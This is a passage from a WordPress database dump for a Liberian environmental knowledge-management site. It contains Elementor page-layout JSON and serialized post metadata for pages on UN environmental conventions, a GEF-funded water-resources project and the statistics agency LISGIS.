_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(17774,2615,'_elementor_version','2.7.5'),(17775,2615,'_elementor_template_type','wp-page'),(17776,2615,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(17780,2617,'_wp_page_template','default'),(17781,2617,'_elementor_controls_usage','a:0:{}'),(17782,2617,'_pods_project_status','On-going'),(17783,2617,'contact_email',''),(17784,2617,'contact_phone',''),(17785,2617,'project_link','<a href=\"http://iwrm.fda.gov.lr/\" target=\"_blank\" rel=\"noopener\">http://iwrm.fda.gov.lr/</a>'),(17786,2617,'_thumbnail_id','2618'),(17787,2617,'funder','The Global Environmental Facility (GEF)'),(17788,2617,'partners',''),(17790,2617,'_dp_original','2558'),(17791,2617,'_edit_lock','1589555044:38'),(17792,2617,'_edit_last','1'),(17793,2618,'_wp_attached_file','2019/11/featured_iwrm.jpg'),(17794,2618,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2019/11/featured_iwrm.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"featured_iwrm-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"featured_iwrm-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"featured_iwrm-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"TECNO CA7\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1539626528\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"3.5\";s:3:\"iso\";s:3:\"114\";s:13:\"shutter_speed\";s:7:\"0.00182\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(17795,2617,'project_status','On-going'),(17797,2620,'_elementor_edit_mode','builder'),(17798,2620,'_elementor_template_type','wp-post'),(17799,2620,'_elementor_version','2.7.5'),(17800,2620,'_wp_page_template','default'),(17801,2620,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8ebf546\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1c7b3ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e89fbef\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b6f5d28\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"lisgis\\\",\\\"tag_id\\\":\\\"56\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"lisgis\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bef4576\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"762ba4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"89dda08\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"867bd0f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:lisgis\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(17802,2620,'_thumbnail_id','2473'),(17804,1544,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(17805,2621,'_elementor_edit_mode','builder'),(17806,2621,'_elementor_template_type','section'),(17807,2621,'_elementor_controls_usage','a:3:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(17808,2621,'_elementor_version','2.7.5'),(17809,2622,'_elementor_edit_mode','builder'),(17810,2622,'_elementor_template_type','section'),(17811,2622,'_elementor_controls_usage','a:0:{}'),(17812,2622,'_elementor_version','2.7.5'),(17813,2621,'_wp_page_template','default'),(17814,2621,'_elementor_data','[{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(17815,2623,'_elementor_edit_mode','builder'),(17816,2623,'_elementor_template_type','section'),(17817,2623,'_elementor_controls_usage','a:0:{}'),(17818,2623,'_elementor_version','2.7.5'),(17819,2623,'_wp_page_template','default'),(17820,2623,'_elementor_data','[{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false}]'),(17821,2624,'_elementor_edit_mode','builder'),(17822,2624,'_elementor_template_type','section'),(17823,2624,'_elementor_controls_usage','a:4:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(17824,2624,'_elementor_version','2.7.5'),(17825,2625,'_elementor_edit_mode','builder'),(17826,2625,'_elementor_template_type','section'),(17827,2625,'_elementor_controls_usage','a:0:{}'),(17828,2625,'_elementor_version','2.7.5'),(17829,2624,'_wp_page_template','default'),(17830,2624,'_elementor_data','[{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"j